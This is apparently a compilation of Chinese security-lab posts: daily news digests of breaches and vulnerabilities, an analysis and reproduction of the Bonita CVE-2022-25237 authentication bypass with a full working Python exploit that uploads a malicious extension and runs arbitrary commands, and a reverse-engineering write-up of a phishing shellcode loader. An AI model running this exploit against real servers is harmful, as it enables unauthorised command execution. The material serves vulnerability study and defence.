免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Twitter表示在最近的数据泄露中没有发现利用漏洞的证据 https://www.securityweek.com/twitter-finds-no-evidence-vulnerability-exploitation-recent-data-leaks Twitter 表示，它已经分析了最近公布的据称包含数亿用户信息的数据库，但没有发现任何漏洞被利用的证据。1 月初，有人在互联网泄露了一个数据库，其中包含大约2.35 亿 Twitter 用户的信息，包括姓名、用户名、电子邮件地址、关注者数量和帐户创建日期。分析公开数据的专家表示，这些数据很可能来自网络抓取。推特周三证实，这 2 亿条记录不是通过利用 2022 年 1 月修补的漏洞获得的，也不是 2、思科警告 EoL 小型企业路由器存在严重漏洞 https://www.securityweek.com/cisco-warns-critical-vulnerability-eol-small-business-routers 思科本周宣布不会针对影响小型企业 RV016、RV042、RV042G 和 RV082 路由器的严重漏洞发布补丁，这些路由器已达到生命周期结束 (EoL)。漏洞跟踪为CVE-2023-20025（CVSS 评分为 9.0），该安全缺陷会影响路由器的基于 Web 的管理界面，并可能被利用绕过身份验证。该问题的存在是因为传入 HTTP 数据包中的用户输入未得到正确验证，从而允许攻击者向路由器发送精心设计的 HTTP 3、华硕 RT-AX82U 路由器存在三个严重漏洞 https://www.securityweek.com/severe-vulnerabilities-allow-hacking-asus-gaming-router 思科的 Talos 安全研究人员发布了有关影响华硕 RT-AX82U 路由器的三个严重漏洞的技术信息。RT-AX82U 是一款 Wi-Fi 6 游戏路由器，可通过在本地网络上运行的 HTTP 服务器进行配置，还支持远程管理和监控。去年，思科的 Talos 研究人员发现了三个严重和高危的安全缺陷，可以利用这些缺陷绕过身份验证、泄露信息或导致易受攻击的 RT-AX82U 路由器出现拒绝服务 (DoS) 情况。这些漏洞中最严重的是 4、有黑客声称可以通过内部人员访问 Telegram 服务器 https://securityaffairs.com/140691/deep-web/telegram-access-dark-web.html 研究人员报告称，一名威胁行为者声称以 20,000 美元的价格提供对 Telegram 内部服务器的访问权限。SafetyDetectives 报道称，暗网市场的一名成员声称以 20,000 美元的价格提供对 Telegram 内部服务器的访问权限。卖方声称该访问权限是永久性的，因为它是由作为公司员工的内部人员提供的。 5、研究人员发现 100 多种西门子 PLC 型号容易受到固件接管的影响 https://thehackernews.com/2023/01/over-100-siemens-plc-models-found.html 安全研究人员披露了西门子 SIMATIC 和 SIPLUS S7-1500 可编程逻辑控制器 (PLC) 中的多个架构漏洞，恶意行为者可能会利用这些漏洞在受影响的设备上偷偷安装固件并控制它们。漏洞由Red Balloon Security发现，这些问题被跟踪为CVE-2022-38773（CVSS 评分：4.6），严重程度较低的前提是利用需要对设备进行物理篡改。该公司表示，这些缺陷“可能允许攻击者绕过所有受保护的启动功能，从而导致对操作代码和数据的 6、研究人员详述 Chromium 浏览器安全漏洞使机密数据面临风险 https://thehackernews.com/2023/01/experts-detail-chromium-browser.html 关于谷歌 Chrome 和基于 Chromium 的浏览器中现已修补的漏洞的详细信息已经出现，如果成功利用该漏洞，可能会窃取包含机密数据的文件。“问题源于浏览器在处理文件和目录时与符号链接交互的方式，”Imperva 研究员 Ron Masas说。“具体来说，浏览器没有正确检查符号链接是否指向一个不打算访问的位置，这允许窃取敏感文件。”谷歌将中等严重性问题 (CVE-2022-3656) 描述为文件系统中数据验证不足的情况，并在 2022 年 10 月 7、APT组织Dark Pink以亚太地区的政府和军方为目标 https://thehackernews.com/2023/01/dark-pink-apt-group-targets-governments.html 根据Group-IB的研究人员进行的最新研究，亚太地区的政府和军事组织正在成为以前未知的高级持续性威胁(APT)组织的目标。大部分攻击针对的是柬埔寨、印度尼西亚、马来西亚、菲律宾、越南和波黑的军事机构、政府部门和机构、宗教和非营利组织，据报道，有一次攻击是针对一家总部设在越南的欧洲机构，但没有成功。据估计，该黑客组织早在2021年中旬就开始了行动，仅在一年后，使用了一种从未见过的自定义工具包，旨在从受感染网络中窃取有价值的信息。 8、StrongPity黑客组织创建假视频聊天应用程序来监视用户 https://therecord.media/strongpity-hackers-created-fake-video-chat-app-to-spy-on-users/ 一项最新研究显示，StrongPity黑客组织已经创建了一个恶意的安卓视频聊天应用程序，可以记录用户的电话通话，收集短信，并从数十个移动应用程序中窃取数据。据网络安全公司ESET称，黑客通过一个假冒真实视频聊天服务Shagle的网站发布了这款恶意应用程序，该服务提供陌生人之间的加密通信。这款假应用基于经过修改的Telegram messenger开源代码，并重新打包了StrongPity的后门代码。StrongPity 9、多家丹麦银行因DDoS攻击而导致运营中断 https://www.infosecurity-magazine.com/news/danish-banks-hit-by-ddos-attack/ 本周，丹麦中央银行和包括Jyske Bank和Sydbank在内的七家私人银行遭到分布式拒绝服务(DDoS) 攻击，导致其运营中断。丹麦中央银行发言人表示，周二下午其网站运行正常。此次攻击还影响了IT金融行业解决方案开发商Bankdata，在Bankdata受到DDoS攻击后，上述私人银行的网站在周二被短暂限制。VMware首席网络安全策略师Rick McElroy表示:“最近针对丹麦央行和一家IT合作伙伴的DDoS攻击再次证明，金融服务业是 10、微软发布 2023 年 1 月份安全更新，总计修复 98 个漏洞 1月10日，微软发布2023年1月份的周二补丁，总计修复了98个漏洞。其中包括已被积极利用的Windows高级本地过程调用(ALPC)权限提升漏洞（CVE-2023-21674）。微软表示这是一个沙盒逃逸漏洞，黑客利用此漏洞可获得SYSTEM权限。此外，还修复了一个已公开披露的Windows SMB Witness Service提权漏洞（CVE-2023-21549）。 http://www.anquan419.com/knews/24/4183.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、红帽宣布全面推出针对RHEL系统的恶意软件检测服务 https://www.securityweek.com/red-hat-announces-general-availability-malware-detection-service Red Hat 周二宣布全面推出针对 Red Hat Enterprise Linux (RHEL) 系统的恶意软件检测服务。Insights 服务是与 IBM X-Force 合作创建的，它使用包含 180 多个与已知 Linux 恶意软件相关联的签名的数据库来扫描 RHEL 系统中的恶意软件。用户可以获得所有系统的汇总结果或单个系统扫描的结果。检测服务支持 RHEL 8 和 9 主机。扫描可以手动运行， 2、英国邮政服务遭网络攻击，暂无法向海外发送信件和包裹 https://www.securityweek.com/cyber-incident-hits-uk-postal-service-halts-overseas-mail 英国邮政表示，周三遭遇“网络事件”，暂时无法向其他国家发送信件或包裹。皇家邮政在其网站上报告说，国际出口服务“经历了严重的服务中断”，但没有提供更多细节。 3、白宫表示"目前"没有迹象表明FAA 服务中断与网络攻击有关 https://www.securityweek.com/no-evidence-cyberattack-related-faa-outage-white-house-says 美国东部时间 7 点 15 分左右，美国联邦航空局命令所有航空公司“暂停所有国内航班，直到东部时间上午 9 点，以便该机构验证航班和安全信息的完整性。”白宫表示，“目前”没有迹象表明网络攻击导致美国联邦航空局系统中断，导致周三停止所有国内航班。 4、谷歌发布 Chrome 109，修补17 个漏洞 https://www.securityweek.com/chrome-109-patches-17-vulnerabilities 谷歌周二宣布在稳定频道发布 Chrome 109，其中包含 17 个漏洞的补丁，其中包括外部研究人员报告的 14 个漏洞。大多数外部报告的安全缺陷都是中低严重性缺陷，其中只有两个被评为“高严重性”。 5、Gootkit Loader 活动针对澳大利亚医疗保健行业 https://securityaffairs.com/140655/malware/gootkit-loader-targets-australia.html 一波 Gootkit 恶意软件加载器攻击利用 VLC 媒体播放器等合法工具针对澳大利亚医疗保健行业。Gootkit也称为 Gootloader，众所周知，它采用搜索引擎优化 (SEO) 中毒策略（又名垃圾索引）进行初始访问。它通常通过破坏和滥用合法基础设施并使用常见关键字为这些网站播种来发挥作用。与其他同类恶意软件一样，Gootkit 能够从浏览器窃取数据、执行浏览器中的对手 (AitB) 攻击、键盘记录、截屏和其他恶意操作。 6、CISA 将Exchange漏洞CVE-2022-41080添加到已知利用漏洞目录中 https://securityaffairs.com/140647/security/cisa-known-exploited-vulnerabilities-catalog-cve-2022-41080.html 美国网络安全和基础设施安全局 (CISA) 在其 已知利用漏洞目录中添加了两个新漏洞。第一个漏洞是CVE-2022-41080，是 Microsoft Exchange 服务器特权升级漏洞。该问题可以与CVE-2022-41082 (ProxyNotShell) 联系起来实现远程代码执行。添加到已知利用漏洞目录的第二个漏洞是 Microsoft Windows 高级本地过程调用 7、超过 1,300 个假的 AnyDesk 站点分发 Vidar 信息窃取恶意软件 https://www.bleepingcomputer.com/news/security/over-1-300-fake-anydesk-sites-push-vidar-info-stealing-malware/ AnyDesk 是适用于 Windows、Linux 和 macOS 的流行远程桌面应用程序，全球有数百万人使用它来实现安全的远程连接或执行系统管理。由于该工具的流行，恶意软件分发活动经常滥用 AnyDesk 品牌。一场使用 1,300 多个域冒充 AnyDesk 官方网站的大规模恶意活动正在进行中，所有活动都重定向到最近推送 Vidar 信息窃取恶意软件的 Dropbox 8、美国最高法院批准 WhatsApp 起诉 NSO 集团 https://www.infosecurity-magazine.com/news/us-supreme-court-whatsapp-to-sue/ 美国最高法院周一批准 WhatsApp 对以色列监控公司 NSO Group 提起诉讼，指控其在大约 1400 台同时安装了 WhatsApp 的设备上安装了 Pegasus 间谍软件。 9、VS Code扩展市场易被滥用于托管恶意扩展程序 https://thehackernews.com/2023/01/hackers-distributing-malicious-visual.html 针对Visual Studio Code扩展市场的一种新的攻击方法可能被利用来上传伪装成合法扩展的恶意扩展程序，目的是发动供应链攻击。研究人员说称，这种技术可以作为攻击许多组织的切入点。VS Code扩展程序允许开发人员向VS Code源代码编辑器中添加编程语言、调试器和工具，以提高他们的工作效率。所有的扩展程序都具有打开VS Code的用户的权限，这意味着该扩展程序可以在您的计算机上安装任何程序，包括勒索软件、擦除器等。 10、Automated Libra组织利用云平台资源进行挖矿 https://www.infosecurity-magazine.com/news/purpleurchin-bypasses-captchas/ 被称为“Automated Libra”的南非黑客组织一直在改进他们的技术，以利用云平台资源进行加密货币挖掘。据称，该组织使用了一种新的验证码解决系统，同时更积极地使用CPU资源进行挖矿，并将“freejacking”与“Play and Run”技术相结合。从技术角度来看，freejacking通常被理解为使用免费或限时的云资源执行加密挖矿操作的过程。Automated Libra组织于2022年10月首次被Sysdig的分析师发现，他们将这

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、微软周二补丁日修复97 个漏洞，含1 个被利用的零日漏洞 https://www.securityweek.com/microsoft-patch-tuesday-97-windows-vulns-1-exploited-zero-day 2、Zoom 修补了 Windows、MacOS 平台上的高危漏洞 https://www.securityweek.com/zoom-patches-high-risk-flaws-windows-macos-platforms 3、GitHub 推出自动漏洞扫描功能 https://www.securityweek.com/github-introduces-automatic-vulnerability-scanning-feature 4、热门开源项目JsonWebToken存在严重远程代码执行漏洞 https://www.securityweek.com/vulnerability-popular-jsonwebtoken-open-source-project-leads-code-execution 5、Kinsing 恶意软件通过错误配置的 PostgreSQL 攻击 Kubernetes 环境 https://securityaffairs.com/140581/hacking/kinsing-malware-kubernetes-environments.html 6、StrongPity APT针对安卓用户分发带后门的 Telegram 应用 https://thehackernews.com/2023/01/strongpity-hackers-distribute.html 7、黑客利用假口袋妖怪NFT接管Windows设备 https://www.bleepingcomputer.com/news/security/hackers-push-fake-pokemon-nft-game-to-take-over-windows-devices/ 8、恶意PyPI软件包使用Cloudflare 隧道潜入防火墙 https://thehackernews.com/2023/01/malicious-pypi-packages-using.html 9、英特尔推出第四代至强处理器将 TDX 添加到机密计算产品组合中 https://www.securityweek.com/intel-adds-tdx-confidential-computing-portfolio-launch-4th-gen-xeon-processors 10、IcedID恶意软件活动针对Zoom用户 https://securityaffairs.com/140465/malware/icedid-targets-zoom-users.html

一、漏洞原理 漏洞简述 Bonitasoft 是一个业务自动化平台，可以更轻松地在业务流程中构建、部署和管理自动化应用程序； Bonita 是一个用于业务流程自动化和优化的开源和可扩展平台。 Bonita Web 2021.2版本受到认证绕过影响，因为其API认证过滤器的过滤模式过于宽泛。 通过添加恶意构造的字符串到API URL，普通用户可以访问需特权的API端点。这可能导致特权API操作将恶意代码添加至服务器，从而造成RCE攻击。 漏洞影响范围 供应商：Bonitasoft 产品：Bonita Platform 确认受影响版本：< 2022.1-u0 修复版本：/ 社区版：< 2022.1-u0 (7.14.0) 订购版：< 2022.1-u0 (7.14.0) 、2021.2-u4 (7.13.4) 、2021.1-0307 (7.12.11) 、7.11.7 漏洞分析 本漏洞的漏洞点来自系统中web.xml文件，该文件用于定义系统应用的路由和如何处理路由的认证及授权。以社区版2021.2 u0为例，XML配置文件路径为bonita\BonitaCommunity-2021.2-u0\server\webapps\bonita\WEB-INF\web.xml。 按照经验来说，这里会是认证绕过易产生之处。确切地说，web.xml中的过滤器很有效地决定了访问特定路由是否应该进行过滤。下图认证过滤器定义赋值参数excludePatterns，值为i18ntranslation。之后将参数传递给2个不同过滤器类：RestAPIAuthorizationFilter, TokenValidatorFilter。 同时上述2个类RestAPIAuthorizationFilter, TokenValidatorFilter，存在同一父类AbstractAuthorizationFilter。 分析这些过滤器都对AbstractAuthorizationFilter进行扩展处理，其中doFilter方法我们展开说明。 路径为org.bonitasoft.console.common.server.login.filter.AbstractAuthorizationFilter#doFilter。 通过sessionIsNotNeeded方法进行检查，如果返回结果为真，则继续代码流程。 （checkValidCondition方法主要对doFilter的两个参数httpRequest、httpResponse进行检查，可能用于同源策略检查，不详细叙述） 下图可以看到该方法主要是参照excludePatterns对请求 URL路径字段进行检查。如果该路径存在该模式，会绕过认证过滤器，从而成功访问资源。 开始定义状态值isMatched，默认值为false。开始进行空值检查，对excludePatterns进行分隔处理。 循环进行检查，如果requestURL包含excludePatterns，则状态值isMatched变为true。跳出循环。 在前面XML文件中参数excludePattern的值为i18ntranslation。这意味着URL路径如果包含i18ntranslation，则会允许认证绕过。 根据代码特征测试，“/i18ntranslation/../“ 或 ”;i18ntranslation“ 可以进行绕过。 另外，远程命令执行（RCE）该漏洞主要是以上传恶意文件作为方式，上传接口同样定义在web.xml，为/API/pageUpload。 getPagePermissions方法在文件处理过程需要session，该session就是从apiSession获取。 根据代码，若未登录状况，apisession无法赋值，该方法会抛出异常。 从攻击角度，我们需要通过非特权下普通用户进行会话，使得apisession正常赋值，进一步实现远程命令执行。 二、漏洞复现实战 环境搭建 docker镜像： https://hub.docker.com/_/bonita vulfocus： bonita镜像 漏洞复现 首先以超级管理员身份进入bonita，创建用户功能 创建普通用户 之后根据POC进行复现 POC： import requests import sys class exploit:    try:        session = requests.session()        bonita_user = sys.argv[1]        bonita_password = sys.argv[2]        target_path = sys.argv[3]        cmd = sys.argv[4]        tempPath = ""        extension_id = ""        bonita_default_user = "install"        bonita_default_password = "install"        platform_default_user = "platformAdmin"        platform_default_password = "platform"    except:        print(f"Usage: python3 {sys.argv[0]} <username> <password> http://localhost:8080/bonita 'cat /etc/passwd'")        exit() def try_default_logins():    req_url = f"{exploit.target_path}/loginservice"    req_cookies = {"x": "x"}    req_headers = {"Content-Type": "application/x-www-form-urlencoded"}    req_data = {"username": exploit.bonita_default_user, "password": exploit.bonita_default_password, "_l": "en"}    r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data)    if r.status_code == 401:        return False        # This does not seem to work when authenticating as platformAdmin, maybe it can though.    #     req_url = f"{exploit.target_path}/platformloginservice"    #     req_cookies = {"x": "x"}    #     req_headers = {"Content-Type": "application/x-www-form-urlencoded"}    #     req_data = {"username": exploit.platform_default_user, "password": exploit.platform_default_password, "_l": "en"}    #     r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data)    #     if r.status_code == 200:    #         print(f"[+] Found default creds: {exploit.platform_default_user}:{exploit.platform_default_password}")    #         return True    else:        print(f"[+] Found default creds: {exploit.bonita_default_user}:{exploit.bonita_default_password}")        return True def login():    req_url = f"{exploit.target_path}/loginservice"    req_cookies = {"x": "x"}    req_headers = {"Content-Type": "application/x-www-form-urlencoded"}    req_data = {"username": exploit.bonita_user, "password": exploit.bonita_password, "_l": "en"}    r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data)    if r.status_code == 401:        print("[!] Could not get a valid session using those credentials.")        exit()    else:        print(f"[+] Authenticated with {exploit.bonita_user}:{exploit.bonita_password}") def upload_api_extension():    req_url = f"{exploit.target_path}/API/pageUpload;i18ntranslation?action=add"    files=[   ("file",("rce_api_extension.zip",open("rce_api_extension.zip",'rb'),'application/octet-stream'))   ]    r = exploit.session.post(req_url, files=files)    exploit.tempPath = r.json()["tempPath"] def activate_api_extension():    req_url = f"{exploit.target_path}/API/portal/page/;i18ntranslation"    req_headers = {"Content-Type": "application/json;charset=UTF-8"}    req_json={"contentName": "rce_api_extension.zip", "pageZip": exploit.tempPath}    r = exploit.session.post(req_url, headers=req_headers, json=req_json)    exploit.extension_id = r.json()["id"] def delete_api_extension():    req_url = f"{exploit.target_path}/API/portal/page/{exploit.extension_id};i18ntranslation"    exploit.session.delete(req_url) def run_cmd():    req_url = f"{exploit.target_path}/API/extension/rce?p=0&c=1&cmd={exploit.cmd}"    r = exploit.session.get(req_url)    print(r.json()["out"]) if not try_default_logins():    print("[!] Did not find default creds, trying supplied credentials.")    login() upload_api_extension() activate_api_extension() try:    run_cmd() except:    delete_api_extension() delete_api_extension() 执行POC 漏洞修复 建议更新至2022.1-u0以上版本 结束语 本文主要介绍了CVE-2022-25237 Bonitasoft 认证绕过和RCE漏洞的原理分析及复现过程，漏洞主要利用构造恶意字段添加至API URL，绕过过滤器进行访问资源，从而造成认证绕过，进一步可远程命令执行。 根据漏洞原理可以参照的是，在安全控制方面，左移安全中安全开发过程及时开展代码审计等测试工作，避免上述漏洞涉及的问题。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、FCC 为无线运营商提出更严格的数据泄露报告规则 https://www.securityweek.com/fcc-proposes-tighter-data-breach-reporting-rules-wireless-carriers 2、AWS 宣布为 S3 存储桶默认启用服务器端加密 https://www.securityweek.com/aws-enables-default-server-side-encryption-s3-objects 3、APT组织Cold River针对美国核研究实验室 https://securityaffairs.com/140555/hacking/cold-river-apt-targets-nuclear-research.html 4、研究揭示了允许数据窃取和 DoS 攻击的 Text-to-SQL 模型漏洞 https://thehackernews.com/2023/01/new-study-uncovers-text-to-sql-model.html 5、报告显示2022 年全球网络攻击量激增 38% https://www.infosecurity-magazine.com/news/global-cyberattack-volume-surges/ 6、Dridex银行木马的新变种以使用macOS的设备为目标 https://securityaffairs.com/140488/malware/dridex-banking-malware-macos.html 7、网络犯罪分子利用OpenAI的ChatGPT开发恶意软件和聊天机器人 https://www.hackread.com/hackers-openai-chatgpt-malware/ 8、黑客利用伪造的口袋妖怪NFT游戏控制受害者的设备 https://www.bleepingcomputer.com/news/security/hackers-push-fake-pokemon-nft-game-to-take-over-windows-devices/ 9、流行开发工具 CircleCI 曝出严重漏洞 https://www.secrss.com/articles/50792 10、印度尼西亚国防承包商 PT Pindad 遭数据泄露 https://www.anquanke.com/post/id/285137

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、高通 UEFI 严重漏洞使微软、联想、三星等设备易受攻击 https://www.securityweek.com/qualcomm-uefi-flaws-expose-microsoft-lenovo-samsung-devices-attacks 2、2022 年美国有200多家政府、教育和医疗机构遭勒索软件攻击 https://www.securityweek.com/ransomware-hit-200-us-gov-education-and-healthcare-organizations-2022 3、IcedID 恶意软件活动针对 Zoom 用户 https://securityaffairs.com/140465/malware/icedid-targets-zoom-users.html 4、Hive 勒索软件团伙泄露了从Consulate Health Care窃取的 550 GB数据 https://securityaffairs.com/140452/cyber-crime/consulate-health-care-hive-ransomware.html 5、Bitdefender 发布了针对 MegaCortex 勒索软件的免费解密器 https://securityaffairs.com/140397/malware/megacortex-ransomware-decryptor.html 6、14 所英国学校遭遇学生和教职工机密数据的大规模泄露 https://www.infosecurity-magazine.com/news/uk-schools-leak-confidential-data 7、Android间谍软件SpyNote以欧洲和亚洲的金融机构为目标 https://thehackernews.com/2023/01/spynote-strikes-again-android-spyware.html 8、攻击者利用Fortinet设备中的漏洞分发勒索软件 https://www.infosecurity-magazine.com/news/fortinet-devices-distribute 9、微软揭示了4个针对macOS的勒索软件家族使用的策略 https://thehackernews.com/2023/01/microsoft-reveals-tactics-used-by-4.html 10、法航和荷航通知客户他们的个人信息在账户被盗后泄露 https://www.bleepingcomputer.com/news/security/air-france-and-klm-notify-customers-of-account-hacks/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、16 家汽车制造商的车辆远程系统、API、基础设施等存在漏洞 https://www.securityweek.com/16-car-makers-and-their-vehicles-hacked-telematics-apis-infrastructure 2、2.35 亿条 Twitter 用户记录在互联网泄露 https://www.securityweek.com/database-containing-235-million-twitter-user-records-available-free 3、Zoho 敦促 ManageEngine 用户修补严重的 SQL 注入漏洞 https://www.securityweek.com/zoho-urges-manageengine-users-patch-serious-sql-injection-vulnerability 4、Slack 称黑客窃取了其私有源代码存储库 https://www.securityweek.com/slack-says-hackers-stole-private-source-code-repositories 5、Bluebottle 网络犯罪集团针对洲法语国家的金融部门 https://thehackernews.com/2023/01/bluebottle-cybercrime-group-preys-on.html 6、NIST 发布了太空操作地面部分的网络安全指南 https://www.securityweek.com/nist-finalizes-cybersecurity-guidance-ground-segment-space-operations 7、网络钓鱼活动冒充Flipper Zero卖家以网络安全专业人士为目标 https://www.infosecurity-magazine.com/news/phishing-campaign-uses-flipper-zero/ 8、丰田汽车公司披露了一起数据泄露事件 https://gbhackers.com/toyota-discloses-data-breach/ 9、超过6万台在线公开Exchange服务器容易受到ProxyNotShell 攻击 https://www.bleepingcomputer.com/news/security/over-60-000-exchange-servers-vulnerable-to-proxynotshell-attacks/ 10、Royal勒索软件团伙声称攻击了昆士兰科技大学 https://www.bleepingcomputer.com/news/security/royal-ransomware-claims-attack-on-queensland-university-of-technology/

前言 事情是这样的，国庆前期某地HVV，所以接到了客户通知他们收到了钓鱼邮件想要溯源 直接下载文件逆向分析一波。钓鱼邮件，图标什么的做的还是挺逼真的，还真的挺容易中招的，但是这里的bug也明显，丹尼斯没有客户端，百度一下能够辨别这是钓鱼的。 逆向分析 查壳工具DIE看是否加壳 当然其他查壳工具也可以exeinfope等，看到的东西不一样 可以看到是64位的应用，无壳，IDA静态分析 直接进入主函数，直接F5逆向main函数c代码 主函数中使用的函数比较少 int __cdecl main(int argc, const char **argv, const char **envp) { HRSRC ResourceW; // rbx HGLOBAL Resource; // rbp signed int v5; // eax size_t v6; // rsi size_t v7; // rcx void *v8; // rdi ResourceW = FindResourceW(0i64, (LPCWSTR)0x66, L"DATA"); Resource = LoadResource(0i64, ResourceW); v5 = SizeofResource(0i64, ResourceW); v6 = v5; v7 = (unsigned int)(v5 + 1); if ( v5 == -1 )   v7 = -1i64; v8 = malloc(v7); memset(v8, 0, (int)v6 + 1); memcpy(v8, Resource, v6); sub_140001070(v8); return 0; } 简单来看就是先查找资源，DATA应该为加密的shellcode，加载资源赋 给Resource,计算资源空间大小，malloc分配空间大小，memset 将申请的内存初始化为0，memcpy函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中,跟进sub_140001070 可以看到反汇编之后在第52行创建进程，在56行分配虚拟内存，60行写入内存，61行创建线程，这里创建的线程即为恶意进程。这里使用动态调试x96dbg验证我们的分析另外，需要分析一下外联的地址以及注入的进程是什么，64位的应用使用x64dbg，依次下断点 简单计算一下地址，IDA的起始地址为00000001400015C4 FindResourcew地址为00000001400015C4 在x64dbg中找到起始地址00007FF638B915C4 根据偏移量跳转下断点 F7按步调试 在loadResource函数中追踪内存 这里加载的是DATA的内容，即为加密的shellcode,我们直接用Resouce hacker直接查看一下恶意进程dennis.exe的DATA内容 说明我们的分析没有问题，继续向下调试 因为这个应用比较小，所以代码量也不大，f5反编译之后可以直接找到函数下断点，这里不需要计算偏移量了，计算方法跟上面差不多。 调试走到这里，可以发现走的是循环 可以明显的看到有xor异或指令，这里对shellcode即DATA的内容做异或，异或的对象为byte ptr指向的地址，内存数据为key,那么key的内容为 因为是按字节异或所以这里异或的内存应该为78，整个循环异或的key应该为12345678，shellcode加密的时候应该用的key为12345678加密的，所以这里解密使用key去解密，跳出循环RIP一下，到断点CreateProcessW 可以清晰的看到注入的进程为C:\\windwos\\system32\\svchost.exe，向下调试 申请虚拟空间内存，然后向下为写入内存 解密完成后写入内存，所以在这里是可以看到外联的ip地址或者说是域名的，这里使用的是ip，查询之后发现是某云的服务器。 在向下就是创建进程起服务svchost.exe了 小结 钓鱼使用的服务器ip地址是某云，怕是可以溯源到本人的真实身份了吧，毕竟现在国内运营商都需要实名，如果用的国内域名也都是实名的不管是否有CDN，不过这种级别的HVV也没必要。第一次逆向分析，多亏了大佬指点，步履维艰，如有错误欢迎指出。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Meta 因数据泄露事件被欧盟罚款 3.9 亿欧元 https://www.securityweek.com/meta-hit-390-million-euro-fine-over-eu-data-breaches 2、Android 针对 2023 Patch 60 漏洞的首次安全更新 https://www.securityweek.com/androids-first-security-updates-2023-patch-60-vulnerabilities 3、Fortinet 的 FortiTester、FortiADC 中发现了严重的命令注入漏洞 https://www.securityweek.com/high-severity-command-injection-flaws-found-fortinets-fortitester-fortiadc 4、Deezer 承认第三方数据泄露可能会泄露超过 2.2 亿用户的信息 https://www.musicbusinessworldwide.com/deezer-admits-data-breach-that-potentially-exposed-over-220-million-users-info 5、新的 shc Linux 恶意软件部署 Cryptominer进行挖矿 https://securityaffairs.com/140308/malware/shc-linux-malware-coinminer.html 6、高通芯片组和联想 BIOS 获得安全更新以修复多个漏洞 https://thehackernews.com/2023/01/qualcomm-chipsets-and-lenovo-bios-get.html 7、BlackCat勒索软件组织创建了泄露受害者数据的网站 https://www.govinfosecurity.com/blackcat-spoofs-victim-website-to-leak-stolen-data-a-20847 8、美国铁路公司Wabtec在Lockbit勒索软件攻击后披露数据泄露 https://www.bleepingcomputer.com/news/security/rail-giant-wabtec-discloses-data-breach-after-lockbit-ransomware-attack/ 9、网络诈骗者通过 Twitter 用户的投诉内容挖取个人信息 https://cybernews.com/news/crooks-monitor-twitter-complaints/ 10、Firefox 火狐浏览器被误识别为微软 IE 11，遭到部分网站拒绝访问 https://www.ithome.com/0/665/155.htm

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、欧洲金融和保险业成为Raspberry Robin蠕虫的攻击目标 https://thehackernews.com/2023/01/raspberry-robin-worm-evolves-to-attack.html 2、报告显示2022年美国105个地方政府遭到勒索软件攻击 https://securityaffairs.com/140242/cyber-crime/ransomware-attacks-emsisoft-report-2022.html 3、黑客论坛出售据称从沃尔沃汽车公司窃取的数据 https://securityaffairs.com/140258/hacking/volvo-cars-data-breach-2.html 4、马来西亚下令调查涉嫌影响约1300万公民的大规模数据泄露事件 https://www.govinfosecurity.com/malaysian-agencies-investigate-alleged-breach-affecting-13-million-a-20839 5、Synology 修复其路由器中的多个严重漏洞 https://securityaffairs.com/140288/security/synology-fixes-critical-flaws-routers.html 6、加拿大铜山矿业公司 (CMMC) 在勒索软件攻击后关闭了工厂 https://securityaffairs.com/140282/cyber-crime/canadian-cmmc-ransomware-attack.html 7、BitRAT 恶意活动利用被盗的敏感银行数据作为诱饵 https://securityaffairs.com/140268/malware/bitrat-bank-data-lures.html 8、谷歌将支付2950万美元解决用户位置跟踪诉讼 https://thehackernews.com/2023/01/google-to-pay-295-million-to-settle.html 9、Chrome浏览器将阻止用户通过不安全HTTP链接下载文件 https://www.anquanke.com/post/id/284830 10、2022年在Windows平台上发现了近 7000 万个新恶意软件样本 https://www.secrss.com/articles/50626